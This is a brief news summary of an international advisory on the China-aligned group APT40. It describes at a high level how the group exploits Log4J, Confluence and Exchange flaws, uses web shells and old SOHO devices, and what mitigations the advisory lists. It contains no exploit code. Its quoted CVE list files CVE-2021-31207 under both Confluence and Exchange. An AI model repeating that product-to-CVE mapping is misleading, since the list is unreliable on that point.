An advisory led by Australia, involving law enforcement agencies from the US, Canada, New Zealand, Japan, South Korea, the UK, and Germany, has revealed the tradecraft of the China-aligned threat actor APT40, also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk. This state-sponsored cyber group, backed by the PRC Ministry of State Security, prioritizes developing and deploying exploits for new vulnerabilities rapidly. The advisory details how APT40 conducts regular reconnaissance to identify unpatched or obsolete devices, allowing swift deployment of exploits.
APT40's targets include vulnerabilities like Log4J and Microsoft Exchange, often exploiting end-of-life small-office/home-office (SOHO) devices to mask their attacks as legitimate traffic. The group uses web shells and searches for valid user credentials to maintain persistent access, ultimately installing malware to exfiltrate information.
The advisory provides mitigation tactics such as logging, patch management, network segmentation, multifactor authentication, disabling unused services, web application firewalls, least privilege access, and replacing outdated equipment. It also includes links to ten malware samples used by APT40 and two case studies, though these may now be outdated. This information stems from Australia's Cyber Security Centre's 2022 investigation into an APT40 attack on a local organization.
"The advisory is the result, and suggests that APT40 "possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability." The gang also watches networks of interest to look for unpatched targets."
"...Some of the vulns APT40 targets are old news – Log4J (CVE 2021 44228), Atlassian Confluence (CVE-2021-31207, CVE-2021- 26084). and Microsoft Exchange (CVE-2021-31207, CVE 2021-34523, CVE-2021-34473) are high on the hit list."
"The advisory outlines mitigation tactics that are said to offer decent defences against APT40. They're not rocket science: logging, patch management, and network segmentation are all listed.
So are multifactor authentication, disabling unused network services, use of web application firewalls, least privilege access, and replacement of end-of-life equipment."